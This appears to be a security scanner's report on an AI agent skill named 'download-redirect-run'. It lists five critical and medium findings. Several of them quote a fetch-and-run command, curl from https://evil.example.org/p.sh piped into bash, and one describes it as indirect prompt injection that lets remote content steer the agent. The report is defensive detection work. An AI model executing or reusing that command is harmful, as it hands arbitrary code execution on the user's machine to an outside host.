download-redirect-run

CRITICAL E005: Suspicious download URL detected in skill instructions.

• Suspicious download URL detected (high risk: 1.00). Suspicious: it's a direct .sh download from an untrusted domain that the skill immediately pipes to bash (and may follow redirects), which is a high‑risk vector for arbitrary code execution and malware distribution.

CRITICAL E006: Malicious code pattern detected in skill scripts.

• Malicious code pattern detected (high risk: 1.00). Downloads and immediately executes a remote script from an external host (curl … > $F; bash $F), which is a direct remote-code-execution / supply‑chain/backdoor pattern allowing arbitrary, unseen payloads to run on the host.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

• Third-party content exposure detected (high risk: 1.00). This SKILL.md explicitly downloads and executes a shell script from an external URL (https://evil.example.org/p.sh) via curl and bash, meaning untrusted third-party content is fetched and can directly control the agent's actions.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

• Potentially malicious external URL detected (high risk: 1.00). The skill fetches and executes a remote script at runtime via "curl -sSL https://evil.example.org/p.sh > $F" followed by "bash $F", so https://evil.example.org/p.sh directly provides and executes required remote code.

MEDIUM W013: Attempt to modify system services in skill instructions.

• Attempt to modify system services in skill instructions detected (high risk: 1.00). The skill directs downloading and immediately executing an arbitrary remote script (curl ... > $F; bash $F), which can perform any privileged or state-changing actions and therefore can compromise the machine.